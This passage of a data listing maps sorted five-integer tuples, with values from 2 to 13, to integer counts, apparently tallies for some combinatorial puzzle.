(2, 2, 5, 7, 12): 17,
(2, 2, 5, 7, 13): 11,
(2, 2, 5, 8, 8): 13,
(2, 2, 5, 8, 9): 13,
(2, 2, 5, 8, 10): 21,
(2, 2, 5, 8, 11): 10,
(2, 2, 5, 8, 12): 17,
(2, 2, 5, 8, 13): 6,
(2, 2, 5, 9, 9): 6,
(2, 2, 5, 9, 10): 12,
(2, 2, 5, 9, 11): 6,
(2, 2, 5, 9, 12): 17,
(2, 2, 5, 9, 13): 11,
(2, 2, 5, 10, 10): 9,
(2, 2, 5, 10, 11): 12,
(2, 2, 5, 10, 12): 25,
(2, 2, 5, 10, 13): 11,
(2, 2, 5, 11, 11): 8,
(2, 2, 5, 11, 12): 12,
(2, 2, 5, 11, 13): 6,
(2, 2, 5, 12, 12): 9,
(2, 2, 5, 12, 13): 11,
(2, 2, 5, 13, 13): 3,
(2, 2, 6, 6, 6): 7,
(2, 2, 6, 6, 7): 10,
(2, 2, 6, 6, 8): 8,
(2, 2, 6, 6, 9): 15,
(2, 2, 6, 6, 10): 14,
(2, 2, 6, 6, 11): 11,
(2, 2, 6, 6, 12): 23,
(2, 2, 6, 6, 13): 6,
(2, 2, 6, 7, 7): 12,
(2, 2, 6, 7, 8): 21,
(2, 2, 6, 7, 9): 18,
(2, 2, 6, 7, 10): 23,
(2, 2, 6, 7, 11): 15,
(2, 2, 6, 7, 12): 25,
(2, 2, 6, 7, 13): 10,
(2, 2, 6, 8, 8): 11,
(2, 2, 6, 8, 9): 22,
(2, 2, 6, 8, 10): 30,
(2, 2, 6, 8, 11): 19,
(2, 2, 6, 8, 12): 24,
(2, 2, 6, 8, 13): 18,
(2, 2, 6, 9, 9): 15,
(2, 2, 6, 9, 10): 13,
(2, 2, 6, 9, 11): 5,
(2, 2, 6, 9, 12): 27,
(2, 2, 6, 9, 13): 12,
(2, 2, 6, 10, 10): 8,
(2, 2, 6, 10, 11): 17,
(2, 2, 6, 10, 12): 29,
(2, 2, 6, 10, 13): 15,
(2, 2, 6, 11, 11): 5,
(2, 2, 6, 11, 12): 17,
(2, 2, 6, 11, 13): 7,
(2, 2, 6, 12, 12): 17,
(2, 2, 6, 12, 13): 13,
(2, 2, 6, 13, 13): 4,
(2, 2, 7, 7, 7): 9,
(2, 2, 7, 7, 8): 13,
(2, 2, 7, 7, 9): 11,
(2, 2, 7, 7, 10): 12,
(2, 2, 7, 7, 11): 9,
(2, 2, 7, 7, 12): 10,
(2, 2, 7, 7, 13): 4,
(2, 2, 7, 8, 8): 11,
(2, 2, 7, 8, 9): 13,
(2, 2, 7, 8, 10): 13,
(2, 2, 7, 8, 11): 7,
(2, 2, 7, 8, 12): 23,
(2, 2, 7, 8, 13): 8,
(2, 2, 7, 9, 9): 4,
(2, 2, 7, 9, 10): 12,
(2, 2, 7, 9, 11): 16,
(2, 2, 7, 9, 12): 11,
(2, 2, 7, 9, 13): 9,
(2, 2, 7, 10, 10): 10,
(2, 2, 7, 10, 11): 7,
(2, 2, 7, 10, 12): 21,
(2, 2, 7, 10, 13): 9,
(2, 2, 7, 11, 11): 4,
(2, 2, 7, 11, 12): 12,
(2, 2, 7, 11, 13): 14,
(2, 2, 7, 12, 12): 7,
(2, 2, 7, 12, 13): 11,
(2, 2, 7, 13, 13): 5,
(2, 2, 8, 8, 8): 3,
(2, 2, 8, 8, 9): 8,
(2, 2, 8, 8, 10): 13,
(2, 2, 8, 8, 11): 17,
(2, 2, 8, 8, 12): 9,
(2, 2, 8, 8, 13): 9,
(2, 2, 8, 9, 9): 1,
(2, 2, 8, 9, 10): 16,
(2, 2, 8, 9, 11): 5,
(2, 2, 8, 9, 12): 19,
(2, 2, 8, 9, 13): 7,
(2, 2, 8, 10, 10): 11,
(2, 2, 8, 10, 11): 12,
(2, 2, 8, 10, 12): 15,
(2, 2, 8, 10, 13): 11,
(2, 2, 8, 11, 11): 3,
(2, 2, 8, 11, 12): 13,
(2, 2, 8, 11, 13): 7,
(2, 2, 8, 12, 12): 9,
(2, 2, 8, 12, 13): 13,
(2, 2, 8, 13, 13): 5,
(2, 2, 9, 9, 10): 3,
(2, 2, 9, 9, 11): 3,
(2, 2, 9, 9, 12): 10,
(2, 2, 9, 9, 13): 4,
(2, 2, 9, 10, 10): 5,
(2, 2, 9, 10, 11): 10,
(2, 2, 9, 10, 12): 14,
(2, 2, 9, 10, 13): 4,
(2, 2, 9, 11, 11): 7,
(2, 2, 9, 11, 12): 5,
(2, 2, 9, 11, 13): 6,
(2, 2, 9, 12, 12): 11,
(2, 2, 9, 12, 13): 5,
(2, 2, 9, 13, 13): 3,
(2, 2, 10, 10, 10): 3,
(2, 2, 10, 10, 11): 4,
(2, 2, 10, 10, 12): 10,
(2, 2, 10, 10, 13): 6,
(2, 2, 10, 11, 11): 5,
(2, 2, 10, 11, 12): 10,
(2, 2, 10, 11, 13): 8,
(2, 2, 10, 12, 12): 9,
(2, 2, 10, 12, 13): 9,
(2, 2, 10, 13, 13): 6,
(2, 2, 11, 11, 11): 2,
(2, 2, 11, 11, 12): 4,
(2, 2, 11, 11, 13): 5,
(2, 2, 11, 12, 12): 5,
(2, 2, 11, 12, 13): 5,
(2, 2, 11, 13, 13): 1,
(2, 2, 12, 12, 12): 4,
(2, 2, 12, 12, 13): 7,
(2, 2, 12, 13, 13): 4,
(2, 3, 3, 3, 3): 4,
(2, 3, 3, 3, 4): 6,
(2, 3, 3, 3, 5): 9,
(2, 3, 3, 3, 6): 12,
(2, 3, 3, 3, 7): 9,
(2, 3, 3, 3, 8): 8,
(2, 3, 3, 3, 9): 11,
(2, 3, 3, 3, 10): 10,
(2, 3, 3, 3, 11): 9,
(2, 3, 3, 3, 12): 10,
(2, 3, 3, 3, 13): 10,
(2, 3, 3, 4, 4): 12,
(2, 3, 3, 4, 5): 14,
(2, 3, 3, 4, 6): 33,
(2, 3, 3, 4, 7): 15,
(2, 3, 3, 4, 8): 18,
(2, 3, 3, 4, 9): 26,
(2, 3, 3, 4, 10): 15,
(2, 3, 3, 4, 11): 12,
(2, 3, 3, 4, 12): 31,
(2, 3, 3, 4, 13): 13,
(2, 3, 3, 5, 5): 9,
(2, 3, 3, 5, 6): 22,
(2, 3, 3, 5, 7): 16,
(2, 3, 3, 5, 8): 11,
(2, 3, 3, 5, 9): 31,
(2, 3, 3, 5, 10): 19,
(2, 3, 3, 5, 11): 11,
(2, 3, 3, 5, 12): 20,
(2, 3, 3, 5, 13): 9,
(2, 3, 3, 6, 6): 21,
(2, 3, 3, 6, 7): 21,
(2, 3, 3, 6, 8): 30,
(2, 3, 3, 6, 9): 30,
(2, 3, 3, 6, 10): 32,
(2, 3, 3, 6, 11): 17,
(2, 3, 3, 6, 12): 36,
(2, 3, 3, 6, 13): 17,
(2, 3, 3, 7, 7): 12,
(2, 3, 3, 7, 8): 11,
(2, 3, 3, 7, 9): 26,
(2, 3, 3, 7, 10): 15,
(2, 3, 3, 7, 11): 13,
(2, 3, 3, 7, 12): 21,
(2, 3, 3, 7, 13): 16,
(2, 3, 3, 8, 8): 8,
(2, 3, 3, 8, 9): 15,
(2, 3, 3, 8, 10): 6,
(2, 3, 3, 8, 11): 11,
(2, 3, 3, 8, 12): 29,
(2, 3, 3, 8, 13): 11,
(2, 3, 3, 9, 9): 12,
(2, 3, 3, 9, 10): 18,
(2, 3, 3, 9, 11): 21,
(2, 3, 3, 9, 12): 27,
(2, 3, 3, 9, 13): 20,
(2, 3, 3, 10, 10): 7,
(2, 3, 3, 10, 11): 8,
(2, 3, 3, 10, 12): 21,
(2, 3, 3, 10, 13): 8,
(2, 3, 3, 11, 11): 8,
(2, 3, 3, 11, 12): 13,
(2, 3, 3, 11, 13): 10,
(2, 3, 3, 12, 12): 18,
(2, 3, 3, 12, 13): 12,
(2, 3, 3, 13, 13): 3,
(2, 3, 4, 4, 4): 9,
(2, 3, 4, 4, 5): 16,
(2, 3, 4, 4, 6): 21,
(2, 3, 4, 4, 7): 25,
(2, 3, 4, 4, 8): 26,
(2, 3, 4, 4, 9): 23,
(2, 3, 4, 4, 10): 22,
(2, 3, 4, 4, 11): 16,
(2, 3, 4, 4, 12): 28,
(2, 3, 4, 4, 13): 16,
(2, 3, 4, 5, 5): 12,
(2, 3, 4, 5, 6): 27,
(2, 3, 4, 5, 7): 26,
(2, 3, 4, 5, 8): 34,
(2, 3, 4, 5, 9): 28,
(2, 3, 4, 5, 10): 24,
(2, 3, 4, 5, 11): 22,
(2, 3, 4, 5, 12): 30,
(2, 3, 4, 5, 13): 28,
(2, 3, 4, 6, 6): 35,
(2, 3, 4, 6, 7): 36,
(2, 3, 4, 6, 8): 41,
(2, 3, 4, 6, 9): 51,
(2, 3, 4, 6, 10): 33,
(2, 3, 4, 6, 11): 24,
(2, 3, 4, 6, 12): 62,
(2, 3, 4, 6, 13): 28,
(2, 3, 4, 7, 7): 17,
(2, 3, 4, 7, 8): 33,
(2, 3, 4, 7, 9): 31,
(2, 3, 4, 7, 10): 41,
(2, 3, 4, 7, 11): 34,
(2, 3, 4, 7, 12): 32,
(2, 3, 4, 7, 13): 23,
(2, 3, 4, 8, 8): 20,
(2, 3, 4, 8, 9): 30,
(2, 3, 4, 8, 10): 40,
(2, 3, 4, 8, 11): 26,
(2, 3, 4, 8, 12): 43,
(2, 3, 4, 8, 13): 16,
(2, 3, 4, 9, 9): 21,
(2, 3, 4, 9, 10): 17,
(2, 3, 4, 9, 11): 19,
(2, 3, 4, 9, 12): 50,
(2, 3, 4, 9, 13): 25,
(2, 3, 4, 10, 10): 16,
(2, 3, 4, 10, 11): 22,
(2, 3, 4, 10, 12): 38,
(2, 3, 4, 10, 13): 25,
(2, 3, 4, 11, 11): 13,
(2, 3, 4, 11, 12): 23,
(2, 3, 4, 11, 13): 21,
(2, 3, 4, 12, 12): 33,
(2, 3, 4, 12, 13): 20,
(2, 3, 4, 13, 13): 6,
(2, 3, 5, 5, 5): 2,
(2, 3, 5, 5, 6): 15,
(2, 3, 5, 5, 7): 14,
(2, 3, 5, 5, 8): 15,
(2, 3, 5, 5, 9): 15,
(2, 3, 5, 5, 10): 14,
(2, 3, 5, 5, 11): 12,
(2, 3, 5, 5, 12): 18,
(2, 3, 5, 5, 13): 11,
(2, 3, 5, 6, 6): 26,
(2, 3, 5, 6, 7): 27,
(2, 3, 5, 6, 8): 30,
(2, 3, 5, 6, 9): 30,
(2, 3, 5, 6, 10): 24,
(2, 3, 5, 6, 11): 27,
(2, 3, 5, 6, 12): 53,
(2, 3, 5, 6, 13): 23,
(2, 3, 5, 7, 7): 18,
(2, 3, 5, 7, 8): 28,
(2, 3, 5, 7, 9): 27,
(2, 3, 5, 7, 10): 31,
(2, 3, 5, 7, 11): 25,
(2, 3, 5, 7, 12): 32,
(2, 3, 5, 7, 13): 22,
(2, 3, 5, 8, 8): 11,
(2, 3, 5, 8, 9): 25,
(2, 3, 5, 8, 10): 34,
(2, 3, 5, 8, 11): 27,
(2, 3, 5, 8, 12): 19,
(2, 3, 5, 8, 13): 19,
(2, 3, 5, 9, 9): 22,
(2, 3, 5, 9, 10): 21,
(2, 3, 5, 9, 11): 23,
(2, 3, 5, 9, 12): 32,
(2, 3, 5, 9, 13): 19,
(2, 3, 5, 10, 10): 8,
(2, 3, 5, 10, 11): 17,
(2, 3, 5, 10, 12): 23,
(2, 3, 5, 10, 13): 25,
(2, 3, 5, 11, 11): 5,
(2, 3, 5, 11, 12): 24,
(2, 3, 5, 11, 13): 23,
(2, 3, 5, 12, 12): 18,
(2, 3, 5, 12, 13): 14,
(2, 3, 5, 13, 13): 11,
(2, 3, 6, 6, 6): 15,
(2, 3, 6, 6, 7): 16,
(2, 3, 6, 6, 8): 28,
(2, 3, 6, 6, 9): 30,
(2, 3, 6, 6, 10): 27,
(2, 3, 6, 6, 11): 26,
(2, 3, 6, 6, 12): 44,
(2, 3, 6, 6, 13): 23,
(2, 3, 6, 7, 7): 21,
(2, 3, 6, 7, 8): 26,
(2, 3, 6, 7, 9): 36,
(2, 3, 6, 7, 10): 32,
(2, 3, 6, 7, 11): 23,
(2, 3, 6, 7, 12): 35,
(2, 3, 6, 7, 13): 23,
(2, 3, 6, 8, 8): 15,
(2, 3, 6, 8, 9): 46,
(2, 3, 6, 8, 10): 35,
(2, 3, 6, 8, 11): 20,
(2, 3, 6, 8, 12): 49,
(2, 3, 6, 8, 13): 11,
(2, 3, 6, 9, 9): 24,
(2, 3, 6, 9, 10): 40,
(2, 3, 6, 9, 11): 28,
(2, 3, 6, 9, 12): 53,
(2, 3, 6, 9, 13): 33,
(2, 3, 6, 10, 10): 16,
(2, 3, 6, 10, 11): 19,
(2, 3, 6, 10, 12): 47,
(2, 3, 6, 10, 13): 23,
(2, 3, 6, 11, 11): 16,
(2, 3, 6, 11, 12): 31,
(2, 3, 6, 11, 13): 16,
(2, 3, 6, 12, 12): 29,
(2, 3, 6, 12, 13): 25,
(2, 3, 6, 13, 13): 12,
(2, 3, 7, 7, 7): 10,
(2, 3, 7, 7, 8): 17,
(2, 3, 7, 7, 9): 13,
(2, 3, 7, 7, 10): 12,
(2, 3, 7, 7, 11): 18,
(2, 3, 7, 7, 12): 20,
(2, 3, 7, 7, 13): 13,
(2, 3, 7, 8, 8): 10,
(2, 3, 7, 8, 9): 20,
(2, 3, 7, 8, 10): 22,
(2, 3, 7, 8, 11): 14,
(2, 3, 7, 8, 12): 24,
(2, 3, 7, 8, 13): 27,
(2, 3, 7, 9, 9): 21,
(2, 3, 7, 9, 10): 19,
(2, 3, 7, 9, 11): 19,
(2, 3, 7, 9, 12): 29,
(2, 3, 7, 9, 13): 17,
(2, 3, 7, 10, 10): 11,
(2, 3, 7, 10, 11): 28,
(2, 3, 7, 10, 12): 21,
(2, 3, 7, 10, 13): 14,
(2, 3, 7, 11, 11): 8,
(2, 3, 7, 11, 12): 19,
(2, 3, 7, 11, 13): 15,
(2, 3, 7, 12, 12): 19,
(2, 3, 7, 12, 13): 18,
(2, 3, 7, 13, 13): 7,
(2, 3, 8, 8, 8): 8,
(2, 3, 8, 8, 9): 8,
(2, 3, 8, 8, 10): 10,
(2, 3, 8, 8, 11): 9,
(2, 3, 8, 8, 12): 13,
(2, 3, 8, 8, 13): 9,
(2, 3, 8, 9, 9): 12,
(2, 3, 8, 9, 10): 18,
(2, 3, 8, 9, 11): 25,
(2, 3, 8, 9, 12): 39,
(2, 3, 8, 9, 13): 11,
(2, 3, 8, 10, 10): 20,
(2, 3, 8, 10, 11): 17,
(2, 3, 8, 10, 12): 28,
(2, 3, 8, 10, 13): 18,
(2, 3, 8, 11, 11): 7,
(2, 3, 8, 11, 12): 17,
(2, 3, 8, 11, 13): 17,
(2, 3, 8, 12, 12): 23,
(2, 3, 8, 12, 13): 15,
(2, 3, 8, 13, 13): 8,
(2, 3, 9, 9, 9): 10,
(2, 3, 9, 9, 10): 15,
(2, 3, 9, 9, 11): 23,
(2, 3, 9, 9, 12): 18,
(2, 3, 9, 9, 13): 17,
(2, 3, 9, 10, 10): 13,
(2, 3, 9, 10, 11): 7,
(2, 3, 9, 10, 12): 23,
(2, 3, 9, 10, 13): 14,
(2, 3, 9, 11, 11): 4,
(2, 3, 9, 11, 12): 23,
(2, 3, 9, 11, 13): 18,
(2, 3, 9, 12, 12): 21,
(2, 3, 9, 12, 13): 18,
(2, 3, 9, 13, 13): 3,
(2, 3, 10, 10, 10): 2,
(2, 3, 10, 10, 11): 12,
(2, 3, 10, 10, 12): 11,
(2, 3, 10, 10, 13): 11,
(2, 3, 10, 11, 11): 6,
(2, 3, 10, 11, 12): 11,
(2, 3, 10, 11, 13): 11,
(2, 3, 10, 12, 12): 21,
(2, 3, 10, 12, 13): 10,
(2, 3, 10, 13, 13): 8,
(2, 3, 11, 11, 11): 4,
(2, 3, 11, 11, 12): 8,
(2, 3, 11, 11, 13): 8,
(2, 3, 11, 12, 12): 18,
(2, 3, 11, 12, 13): 19,
(2, 3, 11, 13, 13): 9,
(2, 3, 12, 12, 12): 13,
(2, 3, 12, 12, 13): 12,
(2, 3, 12, 13, 13): 6,
(2, 3, 13, 13, 13): 4,
(2, 4, 4, 4, 5): 11,
(2, 4, 4, 4, 6): 11,
(2, 4, 4, 4, 7): 11,
(2, 4, 4, 4, 8): 6,
(2, 4, 4, 4, 9): 10,
(2, 4, 4, 4, 10): 10,
(2, 4, 4, 4, 11): 14,
(2, 4, 4, 4, 12): 9,
(2, 4, 4, 4, 13): 10,
(2, 4, 4, 5, 5): 9,
(2, 4, 4, 5, 6): 19,
(2, 4, 4, 5, 7): 17,
(2, 4, 4, 5, 8): 25,
(2, 4, 4, 5, 9): 13,
(2, 4, 4, 5, 10): 22,
(2, 4, 4, 5, 11): 10,
(2, 4, 4, 5, 12): 24,
(2, 4, 4, 5, 13): 10,
(2, 4, 4, 6, 6): 15,
(2, 4, 4, 6, 7): 19,
(2, 4, 4, 6, 8): 20,
(2, 4, 4, 6, 9): 17,
(2, 4, 4, 6, 10): 28,
(2, 4, 4, 6, 11): 19,
(2, 4, 4, 6, 12): 22,
(2, 4, 4, 6, 13): 15,
(2, 4, 4, 7, 7): 13,
(2, 4, 4, 7, 8): 20,
(2, 4, 4, 7, 9): 12,
(2, 4, 4, 7, 10): 18,
(2, 4, 4, 7, 11): 14,
(2, 4, 4, 7, 12): 28,
(2, 4, 4, 7, 13): 7,
(2, 4, 4, 8, 8): 7,
(2, 4, 4, 8, 9): 27,
(2, 4, 4, 8, 10): 21,
(2, 4, 4, 8, 11): 25,
(2, 4, 4, 8, 12): 22,
(2, 4, 4, 8, 13): 23,
(2, 4, 4, 9, 9): 3,
(2, 4, 4, 9, 10): 11,
(2, 4, 4, 9, 11): 8,
(2, 4, 4, 9, 12): 24,
(2, 4, 4, 9, 13): 6,
(2, 4, 4, 10, 10): 16,
(2, 4, 4, 10, 11): 11,
(2, 4, 4, 10, 12): 19,
(2, 4, 4, 10, 13): 9,
(2, 4, 4, 11, 11): 4,
(2, 4, 4, 11, 12): 23,
(2, 4, 4, 11, 13): 1,
(2, 4, 4, 12, 12): 15,
(2, 4, 4, 12, 13): 15,
(2, 4, 4, 13, 13): 4,
(2, 4, 5, 5, 5): 6,
(2, 4, 5, 5, 6): 17,
(2, 4, 5, 5, 7): 13,
(2, 4, 5, 5, 8): 16,
(2, 4, 5, 5, 9): 13,
(2, 4, 5, 5, 10): 16,
(2, 4, 5, 5, 11): 15,
(2, 4, 5, 5, 12): 16,
(2, 4, 5, 5, 13): 9,
(2, 4, 5, 6, 6): 22,
(2, 4, 5, 6, 7): 19,
(2, 4, 5, 6, 8): 39,
(2, 4, 5, 6, 9): 23,
(2, 4, 5, 6, 10): 41,
(2, 4, 5, 6, 11): 25,
(2, 4, 5, 6, 12): 32,
(2, 4, 5, 6, 13): 16,
(2, 4, 5, 7, 7): 23,
(2, 4, 5, 7, 8): 23,
(2, 4, 5, 7, 9): 29,
(2, 4, 5, 7, 10): 17,
(2, 4, 5, 7, 11): 18,
(2, 4, 5, 7, 12): 30,
(2, 4, 5, 7, 13): 21,
(2, 4, 5, 8, 8): 28,
(2, 4, 5, 8, 9): 13,
(2, 4, 5, 8, 10): 28,
(2, 4, 5, 8, 11): 14,
(2, 4, 5, 8, 12): 44,
(2, 4, 5, 8, 13): 14,
(2, 4, 5, 9, 9): 11,
(2, 4, 5, 9, 10): 32,
(2, 4, 5, 9, 11): 27,
(2, 4, 5, 9, 12): 17,
(2, 4, 5, 9, 13): 12,
(2, 4, 5, 10, 10): 14,
(2, 4, 5, 10, 11): 12,
(2, 4, 5, 10, 12): 26,
(2, 4, 5, 10, 13): 20,
(2, 4, 5, 11, 11): 10,
(2, 4, 5, 11, 12): 14,
(2, 4, 5, 11, 13): 18,
(2, 4, 5, 12, 12): 20,
(2, 4, 5, 12, 13): 17,
(2, 4, 5, 13, 13): 10,
(2, 4, 6, 6, 6): 13,
(2, 4, 6, 6, 7): 13,
(2, 4, 6, 6, 8): 23,
(2, 4, 6, 6, 9): 33,
(2, 4, 6, 6, 10): 22,
(2, 4, 6, 6, 11): 15,
(2, 4, 6, 6, 12): 41,
(2, 4, 6, 6, 13): 13,
(2, 4, 6, 7, 7): 23,
(2, 4, 6, 7, 8): 32,
(2, 4, 6, 7, 9): 23,
(2, 4, 6, 7, 10): 37,
(2, 4, 6, 7, 11): 18,
(2, 4, 6, 7, 12): 35,
(2, 4, 6, 7, 13): 31,
(2, 4, 6, 8, 8): 21,
(2, 4, 6, 8, 9): 34,
(2, 4, 6, 8, 10): 38,
(2, 4, 6, 8, 11): 29,
(2, 4, 6, 8, 12): 45,
(2, 4, 6, 8, 13): 30,
(2, 4, 6, 9, 9): 27,
(2, 4, 6, 9, 10): 33,
(2, 4, 6, 9, 11): 17,
(2, 4, 6, 9, 12): 49,
(2, 4, 6, 9, 13): 9,
(2, 4, 6, 10, 10): 32,
(2, 4, 6, 10, 11): 32,
(2, 4, 6, 10, 12): 37,
(2, 4, 6, 10, 13): 25,
(2, 4, 6, 11, 11): 13,
(2, 4, 6, 11, 12): 24,
(2, 4, 6, 11, 13): 13,
(2, 4, 6, 12, 12): 28,
(2, 4, 6, 12, 13): 30,
(2, 4, 6, 13, 13): 11,
(2, 4, 7, 7, 7): 12,
(2, 4, 7, 7, 8): 16,
(2, 4, 7, 7, 9): 17,
(2, 4, 7, 7, 10): 20,
(2, 4, 7, 7, 11): 17,
(2, 4, 7, 7, 12): 18,
(2, 4, 7, 7, 13): 9,
(2, 4, 7, 8, 8): 17,
(2, 4, 7, 8, 9): 21,
(2, 4, 7, 8, 10): 29,
(2, 4, 7, 8, 11): 17,
(2, 4, 7, 8, 12): 45,
(2, 4, 7, 8, 13): 11,
(2, 4, 7, 9, 9): 11,
(2, 4, 7, 9, 10): 19,
(2, 4, 7, 9, 11): 16,
(2, 4, 7, 9, 12): 18,
(2, 4, 7, 9, 13): 22,
(2, 4, 7, 10, 10): 14,
(2, 4, 7, 10, 11): 23,
(2, 4, 7, 10, 12): 40,
(2, 4, 7, 10, 13): 15,
(2, 4, 7, 11, 11): 14,
(2, 4, 7, 11, 12): 26,
(2, 4, 7, 11, 13): 16,
(2, 4, 7, 12, 12): 19,
(2, 4, 7, 12, 13): 13,
(2, 4, 7, 13, 13): 8,
(2, 4, 8, 8, 8): 4,
(2, 4, 8, 8, 9): 22,
(2, 4, 8, 8, 10): 23,
(2, 4, 8, 8, 11): 22,
(2, 4, 8, 8, 12): 19,
(2, 4, 8, 8, 13): 17,
(2, 4, 8, 9, 9): 7,
(2, 4, 8, 9, 10): 25,
(2, 4, 8, 9, 11): 15,
(2, 4, 8, 9, 12): 35,
(2, 4, 8, 9, 13): 13,
(2, 4, 8, 10, 10): 21,
(2, 4, 8, 10, 11): 17,
(2, 4, 8, 10, 12): 38,
(2, 4, 8, 10, 13): 25,
(2, 4, 8, 11, 11): 9,
(2, 4, 8, 11, 12): 37,
(2, 4, 8, 11, 13): 5,
(2, 4, 8, 12, 12): 18,
(2, 4, 8, 12, 13): 26,
(2, 4, 8, 13, 13): 9,
(2, 4, 9, 9, 9): 1,
(2, 4, 9, 9, 10): 7,
(2, 4, 9, 9, 11): 9,
(2, 4, 9, 9, 12): 25,
(2, 4, 9, 9, 13): 4,
(2, 4, 9, 10, 10): 14,
(2, 4, 9, 10, 11): 12,
(2, 4, 9, 10, 12): 24,
(2, 4, 9, 10, 13): 19,
(2, 4, 9, 11, 11): 6,
(2, 4, 9, 11, 12): 7,
(2, 4, 9, 11, 13): 19,
(2, 4, 9, 12, 12): 25,
(2, 4, 9, 12, 13): 11,
(2, 4, 9, 13, 13): 7,
(2, 4, 10, 10, 10): 6,
(2, 4, 10, 10, 11): 11,
(2, 4, 10, 10, 12): 13,
(2, 4, 10, 10, 13): 8,
(2, 4, 10, 11, 11): 11,
(2, 4, 10, 11, 12): 15,
(2, 4, 10, 11, 13): 11,
(2, 4, 10, 12, 12): 15,
(2, 4, 10, 12, 13): 30,
(2, 4, 10, 13, 13): 9,
(2, 4, 11, 11, 11): 3,
(2, 4, 11, 11, 12): 12,
(2, 4, 11, 11, 13): 3,
(2, 4, 11, 12, 12): 13,
(2, 4, 11, 12, 13): 11,
(2, 4, 11, 13, 13): 8,
(2, 4, 12, 12, 12): 14,
(2, 4, 12, 12, 13): 11,
(2, 4, 12, 13, 13): 7,
(2, 5, 5, 5, 5): 1,
(2, 5, 5, 5, 6): 5,
(2, 5, 5, 5, 7): 4,
(2, 5, 5, 5, 8): 2,
(2, 5, 5, 5, 9): 6,
(2, 5, 5, 5, 10): 4,
(2, 5, 5, 5, 11): 5,
(2, 5, 5, 5, 12): 5,
(2, 5, 5, 5, 13): 3,
(2, 5, 5, 6, 6): 7,
(2, 5, 5, 6, 7): 11,
(2, 5, 5, 6, 8): 14,
(2, 5, 5, 6, 9): 15,
(2, 5, 5, 6, 10): 14,
(2, 5, 5, 6, 11): 9,
(2, 5, 5, 6, 12): 10,
(2, 5, 5, 6, 13): 10,
(2, 5, 5, 7, 7): 8,
(2, 5, 5, 7, 8): 13,
(2, 5, 5, 7, 9): 12,
(2, 5, 5, 7, 10): 13,
(2, 5, 5, 7, 11): 9,
(2, 5, 5, 7, 12): 13,
(2, 5, 5, 7, 13): 9,
(2, 5, 5, 8, 8): 7,
(2, 5, 5, 8, 9): 7,
(2, 5, 5, 8, 10): 14,
(2, 5, 5, 8, 11): 7,
(2, 5, 5, 8, 12): 12,
(2, 5, 5, 8, 13): 13,
(2, 5, 5, 9, 9): 5,
(2, 5, 5, 9, 10): 10,
(2, 5, 5, 9, 11): 10,
(2, 5, 5, 9, 12): 10,
(2, 5, 5, 9, 13): 14,
(2, 5, 5, 10, 10): 5,
(2, 5, 5, 10, 11): 10,
(2, 5, 5, 10, 12): 14,
(2, 5, 5, 10, 13): 5,
(2, 5, 5, 11, 11): 5,
(2, 5, 5, 11, 12): 6,
(2, 5, 5, 11, 13): 5,
(2, 5, 5, 12, 12): 4,
(2, 5, 5, 12, 13): 10,
(2, 5, 5, 13, 13): 3,
(2, 5, 6, 6, 6): 6,
(2, 5, 6, 6, 7): 11,
(2, 5, 6, 6, 8): 16,
(2, 5, 6, 6, 9): 26,
(2, 5, 6, 6, 10): 15,
(2, 5, 6, 6, 11): 7,
(2, 5, 6, 6, 12): 26,
(2, 5, 6, 6, 13): 8,
(2, 5, 6, 7, 7): 11,
(2, 5, 6, 7, 8): 22,
(2, 5, 6, 7, 9): 26,
(2, 5, 6, 7, 10): 18,
(2, 5, 6, 7, 11): 22,
(2, 5, 6, 7, 12): 30,
(2, 5, 6, 7, 13): 21,
(2, 5, 6, 8, 8): 15,
(2, 5, 6, 8, 9): 14,
(2, 5, 6, 8, 10): 29,
(2, 5, 6, 8, 11): 18,
(2, 5, 6, 8, 12): 29,
(2, 5, 6, 8, 13): 23,
(2, 5, 6, 9, 9): 14,
(2, 5, 6, 9, 10): 18,
(2, 5, 6, 9, 11): 24,
(2, 5, 6, 9, 12): 30,
(2, 5, 6, 9, 13): 17,
(2, 5, 6, 10, 10): 15,
(2, 5, 6, 10, 11): 25,
(2, 5, 6, 10, 12): 28,
(2, 5, 6, 10, 13): 15,
(2, 5, 6, 11, 11): 5,
(2, 5, 6, 11, 12): 20,
(2, 5, 6, 11, 13): 14,
(2, 5, 6, 12, 12): 20,
(2, 5, 6, 12, 13): 19,
(2, 5, 6, 13, 13): 5,
(2, 5, 7, 7, 7): 15,
(2, 5, 7, 7, 8): 13,
(2, 5, 7, 7, 9): 20,
(2, 5, 7, 7, 10): 18,
(2, 5, 7, 7, 11): 7,
(2, 5, 7, 7, 12): 14,
(2, 5, 7, 7, 13): 10,
(2, 5, 7, 8, 8): 6,
(2, 5, 7, 8, 9): 29,
(2, 5, 7, 8, 10): 23,
(2, 5, 7, 8, 11): 21,
(2, 5, 7, 8, 12): 30,
(2, 5, 7, 8, 13): 12,
(2, 5, 7, 9, 9): 7,
(2, 5, 7, 9, 10): 17,
(2, 5, 7, 9, 11): 19,
(2, 5, 7, 9, 12): 27,
(2, 5, 7, 9, 13): 18,
(2, 5, 7, 10, 10): 14,
(2, 5, 7, 10, 11): 13,
(2, 5, 7, 10, 12): 23,
(2, 5, 7, 10, 13): 25,
(2, 5, 7, 11, 11): 12,
(2, 5, 7, 11, 12): 20,
(2, 5, 7, 11, 13): 11,
(2, 5, 7, 12, 12): 8,
(2, 5, 7, 12, 13): 18,
(2, 5, 7, 13, 13): 5,
(2, 5, 8, 8, 8): 4,
(2, 5, 8, 8, 9): 10,
(2, 5, 8, 8, 10): 20,
(2, 5, 8, 8, 11): 5,
(2, 5, 8, 8, 12): 15,
(2, 5, 8, 8, 13): 8,
(2, 5, 8, 9, 9): 11,
(2, 5, 8, 9, 10): 20,
(2, 5, 8, 9, 11): 14,
(2, 5, 8, 9, 12): 16,
(2, 5, 8, 9, 13): 21,
(2, 5, 8, 10, 10): 14,
(2, 5, 8, 10, 11): 16,
(2, 5, 8, 10, 12): 31,
(2, 5, 8, 10, 13): 12,
(2, 5, 8, 11, 11): 9,
(2, 5, 8, 11, 12): 12,
(2, 5, 8, 11, 13): 15,
(2, 5, 8, 12, 12): 11,
(2, 5, 8, 12, 13): 12,
(2, 5, 8, 13, 13): 5,
(2, 5, 9, 9, 9): 4,
(2, 5, 9, 9, 10): 8,
(2, 5, 9, 9, 11): 3,
(2, 5, 9, 9, 12): 13,
(2, 5, 9, 9, 13): 6,
(2, 5, 9, 10, 10): 11,
(2, 5, 9, 10, 11): 21,
(2, 5, 9, 10, 12): 12,
(2, 5, 9, 10, 13): 10,
(2, 5, 9, 11, 11): 12,
(2, 5, 9, 11, 12): 18,
(2, 5, 9, 11, 13): 10,
(2, 5, 9, 12, 12): 17,
(2, 5, 9, 12, 13): 18,
